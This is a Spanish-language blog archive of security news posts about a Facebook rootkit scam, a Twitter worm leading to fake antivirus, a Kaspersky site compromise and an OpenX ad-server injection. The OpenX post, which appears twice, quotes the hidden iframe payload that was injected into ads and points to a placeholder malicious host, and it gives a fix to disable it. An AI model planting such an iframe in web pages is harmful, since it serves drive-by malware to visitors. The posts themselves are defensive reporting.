Mostrando entradas con la etiqueta Malware. Mostrar todas las entradas
Mostrando entradas con la etiqueta Malware. Mostrar todas las entradas
domingo, 1 de abril de 2012
Facebook: Nuevo malware infecta a miles de usuarios
Lo mas de 800 millones de usuarios de facebook la convierten
en un apetitoso blanco para los ciberdelincuentes, por mínimo que esta
sea supone miles de usuarios infectados o estafados.
Un falso enlace a la supuesta web del canal estadounidense CNN avisa
de un inminente ataque militar de Estados Unidos contra Irán y Arabia
Saudí, en lo que supondría el teórico inicio de la Tercera Guerra
Mundial.
En dicho enlace el usuario es redirigido a una web falsa con la apariencia del citado medio de reconocido prestigio mundial.
En dicha web se intenta atraer la atención de las víctimas con
supuestos vídeos sobre el citado conflicto. Sin embargo, para poder
visualizarlos al pulsarlos se pide a los usuarios que instalen una supuesta actualización de Adobe Flash Player, momento en el que se descarga e instala el archivo malicioso, detectado como “Troj / Rootkit-JV“.
Al tratarse de un rootkit,
entraña los riesgos de este tipo de malware, convirtiendo el ordenador
infectado en una fuente para que los intrusos puedan extraer de él todo
tipo de información sin el permiso del usuario o ejecutar acciones de
forma remota.
El ritmo de propagación del malware ha sido muy alto, ya que según alerta la empresa de seguridad, más de 60.000 usuarios han sido engañados
en apenas tres horas. Sophos ha señalado que el código malicioso
instalado en los ordenadores de los usuarios está enviando el mensaje a
Facebook sin que los usuarios lo sepan, de modo que sus contactos son
víctimas potenciales de este archivo.
domingo, 23 de enero de 2011
Gusano de Twitter golpea goo.gl y redirige a antivirus falso
Un gusano de Twitter de rápida propagación que utiliza el servicio de redirección de Google, goo.gl, anda en circulación y lleva a usuarios desprevenidos a una notoria campaña malware scareware (antivirus falso).
De acuerdo con los "cazadores" de malware a cargo de buscar la amenaza, la cadena de redirección del gusano lleva a los usuarios a una página web que aloja el Rogue AV "Security Shield". La página utiliza técnicas de ofuscamiento que incluye una implementación de criptografía RSA en JavaScript para ocultar el código.
El investigador de malware, Nicolas Brulez, de laboratorios Kaspersky, comentó que los enlaces originales de "goo.gl"en los mensajes de Twitter, redirigen a los usuarios a diferentes dominios con la página "m28sx.html". Esa página posteriormente redirige a un dominio estático con una dirección ucraniana de alto nivel.
Por si esto no fuera suficiente, el dominio redirige al usuario a otra dirección IP, la cual ha sido relacionada anteriormente con la distribución de antivirus falsos. "Esta dirección IP hará el trabajo final de redirección, el cual lleva al sitio actual del AV falso", explicó Brulez.
Una vez que la sesión de navegador del usuario es redirigida al sitio malicioso, un mensaje de advertencia alerta de que la máquina está ejecutando aplicaciones sospechosas y el usuario es encaminado a realizar un escaneo. Como siempre, el resultado es que la máquina está contaminada con amenazas maliciosas y la estafa resulta al engañar al usuario para descargar una falsa herramienta de desinfección.
domingo, 24 de octubre de 2010
El sitio web de Kaspkersky fue infectado con software malicioso
Por medio de diversos foros, algunos usuarios comenzaron a reportar que al intentar descargar una solución de seguridad de Kaspkersky eran enviados a una página externa en la que se ofrecían antivirus falsos (los llamados rogueware).
En un principio un portavoz de Kaspkersky negó los reportes, pero poco después la firma confirmó que la web fue comprometido el domingo por medio de una vulnerabilidad en una de las aplicaciones que utilizan para administrar el sitio. No obstante, señalaron que el problema sólo duro unas ‘tres horas y media’.
Kaspkersky asegura que ningún momento los datos de los usuarios corrieron peligro, así que parece que el problema no fue a mayores. Por desgracia, no es la primera vez que les pasa algo así, pues hace un año un hacker reveló una falla en el sitio web de la compañía que permitía tener acceso a la base de datos.
domingo, 12 de septiembre de 2010
Malware a través de OpenX y 2 soluciones para evitarlo
Como muchos se habrán podido dar cuenta, hace unos días al visitar algunos de los blogs de Medios y Redes diversos navegadores de Internet mostraban una advertencia sobre que el sitio web en cuestión alojaba software malicioso. Este problema ya fue solucionado, y tal como se explicó en el blog corporativo, se debió a que OpenX, la plataforma con la que se gestionan campañas de publicidad de la red, fue infectada con un código malicioso.
Existe una vulnerabilidad en algunas versiones de OpenX 2.8.x que posibilita inyectar código en la base de datos de las campañas publicitarias. En este caso, se detectó que en el campo “append” fue insertado el siguiente iframe:
“<iframe src="http://sitio-web-malicioso/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>”
Este código se sirve junto con los anuncios de OpenX, y tiene la finalidad de descargar malware en el equipo del usuario. Lo más recomendable es actualizar a la última versión de OpenX, la cual al parecer cierra la vulnerabilidad, pero si por cualquier motivo no les es posible, pueden recurrir a estas dos soluciones:
1.Verificar constantemente que el campo “append” no tenga código malicioso. No es algo muy efectivo si se hace de forma manual, pero se puede crear un script en cronjob que verifique cada cierto tiempo dicho campo y que nos alerte en caso de que encuentre código malicioso, de este modo podremos eliminarlo lo más pronto posible de la base de datos.
2.En caso de que no se utilice, inhabilitar el campo “append”. Para esto únicamente debemos editar el archivo “/www/delivery/ajs.php” de nuestra instalación de OpenX y en la línea 3227 reemplazar el fragmento de código “!empty($aBanner['append']) ? $aBanner['append'] : ”” por “$append=”";“.
Esto no corrige la vulnerabilidad, pero por lo menos evita que se siga sirviendo el código malicioso a través de los anuncios de publicidad. En los foros de OpenX se puede ver que muchos usuarios se han visto afectados por este problema, así que si usan esta herramienta les recomendamos que tomen sus precauciones.
Existe una vulnerabilidad en algunas versiones de OpenX 2.8.x que posibilita inyectar código en la base de datos de las campañas publicitarias. En este caso, se detectó que en el campo “append” fue insertado el siguiente iframe:
“<iframe src="http://sitio-web-malicioso/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>”
Este código se sirve junto con los anuncios de OpenX, y tiene la finalidad de descargar malware en el equipo del usuario. Lo más recomendable es actualizar a la última versión de OpenX, la cual al parecer cierra la vulnerabilidad, pero si por cualquier motivo no les es posible, pueden recurrir a estas dos soluciones:
1.Verificar constantemente que el campo “append” no tenga código malicioso. No es algo muy efectivo si se hace de forma manual, pero se puede crear un script en cronjob que verifique cada cierto tiempo dicho campo y que nos alerte en caso de que encuentre código malicioso, de este modo podremos eliminarlo lo más pronto posible de la base de datos.
2.En caso de que no se utilice, inhabilitar el campo “append”. Para esto únicamente debemos editar el archivo “/www/delivery/ajs.php” de nuestra instalación de OpenX y en la línea 3227 reemplazar el fragmento de código “!empty($aBanner['append']) ? $aBanner['append'] : ”” por “$append=”";“.
Esto no corrige la vulnerabilidad, pero por lo menos evita que se siga sirviendo el código malicioso a través de los anuncios de publicidad. En los foros de OpenX se puede ver que muchos usuarios se han visto afectados por este problema, así que si usan esta herramienta les recomendamos que tomen sus precauciones.
Suscribirse a:
Entradas (Atom)



